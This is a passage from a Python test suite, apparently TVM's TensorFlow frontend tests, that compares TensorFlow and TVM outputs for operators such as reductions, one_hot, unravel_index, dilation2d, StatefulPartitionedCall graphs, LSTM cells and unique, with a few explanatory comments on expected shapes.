axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_raw_reduce_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
_check_op(
op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
)
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
_test_raw_reduce_op(tf.raw_ops.Max)
_test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
in2 = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
op = func(in1, in2, name="op")
out = tf.cast(op, tf.int32, name="out1")
compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
_test_forward_rel_op([t1, t2], math_ops.less)
_test_forward_rel_op([t1, t2], math_ops.greater)
_test_forward_rel_op([t1, t2], math_ops.less_equal)
_test_forward_rel_op([t1, t2], math_ops.greater_equal)
_test_forward_rel_op([t1, t2], math_ops.equal)
_test_forward_rel_op([t1, t2], math_ops.not_equal)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
out = tf.expand_dims(in1, axis)
compare_tf_with_tvm([data], [in1.name], out.name)
def test_forward_expand_dims():
_test_forward_expand_dims(np.int32(1), 0)
_test_forward_expand_dims(np.array([1]), 0)
_test_forward_expand_dims(np.array([1]), -1)
_test_forward_expand_dims(np.array([[1], [2]]), 0)
_test_forward_expand_dims(np.array([[1], [2]]), 1)
_test_forward_expand_dims(np.array([[1], [2]]), -1)
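# Worked shapes for the expand_dims cases above (values are unchanged, only a
# length-1 axis is inserted):
#   expand_dims(np.int32(1), 0)           -> shape (1,)
#   expand_dims(np.array([1]), 0 or -1)   -> shape (1, 1)
#   expand_dims(np.array([[1], [2]]), 0)  -> shape (1, 2, 1)
#   expand_dims(np.array([[1], [2]]), 1)  -> shape (2, 1, 1)
#   expand_dims(np.array([[1], [2]]), -1) -> shape (2, 1, 1)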
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
"""test Op Maximum"""
def check_maximum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.maximum(lft_data, rgt_data, name="maximum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "maximum:0")
check_maximum((10, 8, 16, 32), (1,), dtype="int32")
check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
"""test Op Minimum"""
def check_minimum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.minimum(lft_data, rgt_data, name="minimum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "minimum:0")
check_minimum((10, 8, 16, 32), (1,), dtype="int32")
check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
with tf.Graph().as_default():
in_data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
var1 = tf.Variable(in_data1, name="in1")
var2 = array_ops.placeholder_with_default(var1, None, name="place1")
in_data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
place1 = array_ops.placeholder(shape=in_data1.shape, dtype=in_data1.dtype, name="in2")
out1 = tf.math.add(var1, var2, name="out1")
out2 = tf.math.add(out1, place1, name="out2")
compare_tf_with_tvm(
[in_data1, in_data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
)
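# Note on the graph above (descriptive, not normative): place1 is a
# placeholder_with_default backed by var1, so feeding "place1:0" overrides the
# variable's value while remaining optional, whereas "in2:0" is a plain placeholder
# and must always be fed. compare_tf_with_tvm therefore feeds both tensors and sets
# init_global_variables=True so var1/var2 exist on the TF side of the comparison.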
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
inp_array1 = np.random.randint(0, 5, size=indices_shape)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array1.shape, dtype=inp_array1.dtype)
out = tf.one_hot(in1, depth, on_value, off_value, axis, dtype=out_dtype)
compare_tf_with_tvm(inp_array1, in1.name, out.name)
def test_forward_one_hot():
_test_forward_one_hot((3,), 3, 1, 0, -1, "int32")
_test_forward_one_hot((3,), 3, 1.0, 0.0, -1, "float32")
_test_forward_one_hot((2, 2), 5, 2, -2, 0, "int32")
_test_forward_one_hot((2, 2), 5, 0.5, -0.5, 1, "float32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1, 0, 1, "int32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32")
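# Worked example for the depth=3, on_value=1, off_value=0, axis=-1 case above,
# with indices in [0, depth): indices [0, 2, 1] one-hot encode to
#   [[1, 0, 0],
#    [0, 0, 1],
#    [0, 1, 0]]
# With axis=0 the one-hot dimension is prepended instead of appended.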
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.add_n(temp)
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def test_forward_add_n():
x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
in0 = x
in1 = [x, y]
in2 = (x, y, z)
in3 = m
in4 = [m, n]
in5 = (m, n, o)
_test_forward_add_n(in0)
_test_forward_add_n(in1)
_test_forward_add_n(in2)
_test_forward_add_n(in3)
_test_forward_add_n(in4)
_test_forward_add_n(in5)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
"""Test the sharing params case."""
np_data = np.random.uniform(size=(2, 2, 2)).astype("float32")
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
axis = tf.constant([-1], dtype=tf.int32, name="axis")
mean0 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean0")
mean1 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean1")
out = tf.add(mean0, mean1, name="out")
compare_tf_with_tvm([np_data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.unravel_index(temp[0], temp[1])
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
tf.reset_default_graph()
with tf.Graph().as_default():
indices_1 = constant_op.constant(x, dtype=dtype)
dims_1 = constant_op.constant(y, dtype=dtype)
out_1 = array_ops.unravel_index(indices_1, dims_1)
compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
x = np.array([0, 1, 2, 3])
y = np.array([2, 2])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([2, 3])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([6])
_test_forward_unravel_index([x, y])
x = np.array([102, 300, 16])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
x = np.array([100])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
# Test scalar input
_test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
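# Worked example (illustrative only): unravel_index maps flat, row-major indices
# back to per-dimension coordinates. For indices [0, 1, 2, 3] and dims [2, 2] the
# expected output rows are [0, 0, 1, 1] and [0, 1, 0, 1]; the scalar case above,
# 13 with dims [1, 4, 5, 2], maps to the coordinate (0, 1, 1, 1).
def _unravel_index_numpy_reference():
    # NumPy reference for the same mapping; returns one coordinate array per dim.
    # Not invoked by the test suite, provided only as a sanity-check sketch.
    return np.unravel_index([0, 1, 2, 3], (2, 2))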
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
""" One iteration of dilation2d with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Dilation2D:0",
no_gpu=True,
)
def test_forward_dilation():
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID")
def _test_identityn(data_np_list):
with tf.Graph().as_default():
data_tensors = []
data_tensors_name = []
for index, data_np in enumerate(data_np_list):
tensor_name = f"data_{index}"
data_tensors_name.append(tensor_name + ":0")
data_tensors.append(
tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
)
output = tf.identity_n(data_tensors)
output_names = [out.name for out in output]
compare_tf_with_tvm(
data_np_list,
data_tensors_name,
output_names,
)
@pytest.mark.parametrize(
"data_np_list",
[
(
[
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
]
),
(
[
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
np.array([True, False, True]),
]
),
(
[
np.array([]),
np.array([[]]),
]
),
],
)
def test_forward_identityn(data_np_list):
_test_identityn(data_np_list)
#######################################################################
# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
"""test operator infinity ops"""
# Only float types are allowed in Tensorflow for isfinite and isinf
# float16 is failing on cuda
tf_dtypes = ["float32", "float64"]
for tf_dtype in tf_dtypes:
shape = (8, 8)
data = np.random.uniform(size=shape).astype(tf_dtype)
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.infty
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
tf.reset_default_graph()
in_data = tf.placeholder(tf_dtype, shape, name="in_data")
tf_op(in_data, name=name)
compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
_verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
_verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
_verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
with tf.Graph().as_default():
@function.Defun(*[tf.int32] * 2)
def Forward(x, y):
print(x.name)
print(y.name)
b = tf.add(x, y)
return b
pl1 = tf.placeholder(tf.int32, name="pl1")
pl2 = tf.placeholder(tf.int32, name="pl2")
pl3 = tf.placeholder(tf.int32, name="pl3")
data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
z2 = z1 + pl3
compare_tf_with_tvm(
[data, data2, data3],
["pl1:0", "pl2:0", "pl3:0"],
["StatefulPartitionedCall:0", z2.name],
mode="vm",
init_global_variables=True,
)
def _test_spop_placeholder_with_shape_and_default_value():
with tf.Graph().as_default():
data = np.ones([1], dtype=int).astype(np.int32)
dataVar = tf.Variable(data, shape=data.shape)
pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
@function.Defun(*[tf.int32])
def pl_with_default(pl):
return tf.expand_dims(tf.multiply(pl, pl), 0)
z = gen_functional_ops.StatefulPartitionedCall(
args=[tpl], Tout=[tf.int32], f=pl_with_default
)
compare_tf_with_tvm(
data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_arange_feed():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_array_feed():
with tf.Graph().as_default():
t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
t1 = tf.placeholder(tf.int32, name="t1")
t2 = tf.placeholder(tf.int32, name="t2")
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_basic():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, name="t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def myfunc(x, y):
return tf.add(x, y, "myfunc")
@tf.function
def myfunc2(x, y):
z = myfunc(x, y)
l = myfunc(z, y)
m = myfunc(l, z)
return tf.add(l, m, "myfunc2")
res1 = myfunc(t1, t2)
res2 = myfunc2(res1, t1)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_no_autograph():
with tf.Graph().as_default():
@tf.function(autograph=False)
def fun1(a):
return tf.multiply(a, a)
@tf.function(autograph=False)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)],
Tout=[dtypes.float32],
f=fun3,
name="SpopFnInvocation",
)
compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 3)
def arithmetic(m, x, c):
z = tf.add(tf.multiply(m, x), c)
return z
m = tf.constant(10)
x = tf.constant(20)
c = tf.constant(2)
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[m, x, c], Tout=[tf.int32], f=arithmetic
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_control_flow():
with tf.Graph().as_default():
@function.Defun(*[dtypes.float32] * 2)
def Body1(x, y):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
z = math_ops.multiply(x, y)
i = 0
while i < 10:
i += 1
if i == 5:
continue
z = math_ops.multiply(x, y * i)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[constant_op.constant(32.0), constant_op.constant(100.0)],
Tout=[dtypes.float32],
f=Body1,
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_variables():
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32)
var2 = tf.Variable(const2, dtype=tf.int32)
@function.Defun(tf.int32, tf.int32)
def Forward(x, y):
return tf.multiply(x, y)
z = gen_functional_ops.StatefulPartitionedCall(
args=[var1, var2], Tout=[tf.int32], f=Forward
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
)
def _test_spop_constants():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 2)
def constantsFn(x, y):
vv = tf.constant([2, 3, 4], name="vv")
z = tf.add(vv + x, y)
return z
a = tf.constant(20000, name="a")
b = tf.constant(40000, name="b")
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[a, b], Tout=[tf.int32], f=constantsFn
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_stateful():
# This test case is to test that TVM rejects any TF stateful operations
# (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
# (as these two operators can still be used as container graphs to execute
# "stateless" operations internally.
tf.reset_default_graph()
with tf.Graph().as_default():
@tf.function
def FunctionWithStatefulOp_One(i):
b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
y = tf.multiply(b, i)
return y
@tf.function
def FunctionWithStatefulOp(m, n):
a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
x = tf.multiply(a, m)
y = FunctionWithStatefulOp_One(n)
z = tf.multiply(x, y)
return z
op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
# This test case is to test that TVM rejects inconsistent device assignment
# while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
# be used as container graphs to internally execute "stateless" operations.
tf.reset_default_graph()
with tf.Graph().as_default():
def fun1(a):
with ops.device("/GPU:0"):
return tf.multiply(a, a)
def fun2(b):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
with ops.device("/CPU:0"):
x = fun2(x)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
y = fun1(y)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
# This test case is to test that TVM rejects any graph containing
# resource variables with StatefulPartitionedOp.
tf.reset_default_graph()
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
@tf.function
def resourceVariablesTest(x, y):
return tf.multiply(x, y)
op = resourceVariablesTest(var1, var2)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
_test_spop_stateful()
_test_spop_device_assignment()
_test_spop_resource_variables()
# Placeholder test cases
_test_spop_placeholder_without_shape_info()
_test_spop_placeholder_with_shape_and_default_value()
_test_spop_placeholder_numpy_arange_feed()
_test_spop_placeholder_numpy_array_feed()
# Function Invocation test cases
_test_spop_function_invocation_basic()
_test_spop_function_invocation_nested()
_test_spop_function_invocation_no_autograph()
_test_spop_function_invocation_defun()
# Test cases for various other TF constructs
_test_spop_arithmetic()
_test_spop_control_flow()
_test_spop_variables()
_test_spop_constants()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
tf.reset_default_graph()
with tf.Graph().as_default():
data = tf.placeholder(tf.float32, name="data", shape=(None,))
out = data + 1
np_data = np.random.uniform(size=(2,)).astype("float32")
out_name = "add"
with tf.Session() as sess:
graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
np_data,
["data"],
1,
target=device,
layout="NCHW",
out_names=[out_name],
mode="vm",
ignore_in_shape=True,
)
tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynamic_rnn_lstmblockcell():
if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
return
total_series_length = 50000
truncated_backprop_length = 15
state_size = 4
echo_step = 3
batch_size = 5
num_layers = 5
def generateData():
x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
y = np.roll(x, echo_step)
y[0:echo_step] = 0
x = x.reshape((batch_size, -1)) # The first index changing slowest, subseries as rows
y = y.reshape((batch_size, -1))
return (x, y)
batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
state_per_layer_list = tf.unstack(init_state, axis=0)
rnn_tuple_state = tuple(
[
tf.nn.rnn_cell.LSTMStateTuple(
state_per_layer_list[idx][0], state_per_layer_list[idx][1]
)
for idx in range(num_layers)
]
)
# Forward passes
def lstm_cell():
return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
cell = tf.nn.rnn_cell.MultiRNNCell(
[lstm_cell() for _ in range(num_layers)], state_is_tuple=True
)
states_series, current_state = tf.nn.dynamic_rnn(
cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
x, y = generateData()
_current_state = np.zeros((num_layers, 2, batch_size, state_size))
start_idx = 0
end_idx = start_idx + truncated_backprop_length
batchX = x[:, start_idx:end_idx]
# Save current state for TVM
current_state_tvm = _current_state
_current_state, _states_series = sess.run(
[current_state, states_series],
feed_dict={batchX_placeholder: batchX, init_state: _current_state},
)
# Organize results and corresponding names
tf_output = [_states_series]
for c in _current_state:
tf_output.append(c.c)
tf_output.append(c.h)
name = [states_series.name.split(":")[0]]
for t in current_state:
name.append(t.c.name.split(":")[0])
name.append(t.h.name.split(":")[0])
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
tvm_output = run_tvm_graph(
final_graph_def,
[batchX.astype("float32"), current_state_tvm.astype("float32")],
["Placeholder", "Placeholder_1"],
out_names=name,
num_output=len(name),
mode="vm",
disabled_pass=["FoldScaleAxis"],
)
# Compare result
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique(in_data)
if is_dyn:
compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
else:
compare_tf_with_tvm(None, "", ["Unique:0", "Unique:1"])
def test_forward_unique():
"""test Unique"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique(50, dtype, is_dyn)
_test_unique(100, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique_with_counts(in_data)
if is_dyn:
compare_tf_with_tvm(
np_data,
"in_data:0",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
else:
compare_tf_with_tvm(
None, "", ["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"]
)
def test_forward_unique_with_counts():
"""test UniqueWithCounts"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique_with_counts(10, dtype, is_dyn)
_test_unique_with_counts(20, dtype, is_dyn)
#######################################################################
# check graph ir for nn.moments
# ------------
def test_moments():
g = tf.Graph()
shape = [4, 176, 8, 8]
dtype = "float32"
with g.as_default():
A = tf.placeholder(shape=shape, dtype=dtype, name="A")
B = tf.placeholder(shape=shape, dtype=dtype, name="B")
mean, variance = tf.nn.moments(A, [1], keep_dims=True)
normalised_input = (A - mean) / tf.sqrt(variance + 0.0005)
mod, _ = from_tensorflow(g.as_graph_def(add_shapes=True))
program = """
def @main(%A: Tensor[(4, 176, 8, 8), float32]) {
%527 = mean(%A, axis=[1], keepdims=True) /* moments/mean */;
%528 = subtract(%A, %527) /* sub */;
%529 = subtract(%A, %527);
%530 = multiply(%529, %529) /* moments/SquaredDifference */;
%531 = mean(%530, axis=[1], keepdims=True) /* moments/variance */;
%532 = add(%531, 0.0005f) /* add */;
%533 = sqrt(%532) /* Sqrt */;
divide(%528, %533) /* truediv */
}
"""
mod_golden = tvm.parser.parse('#[version = "0.0.5"]\n' + program)
tvm.ir.assert_structural_equal(mod["main"].body, mod_golden["main"].body, map_free_vars=True)
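# Note on test_moments above (descriptive): the golden Relay text pins the expected
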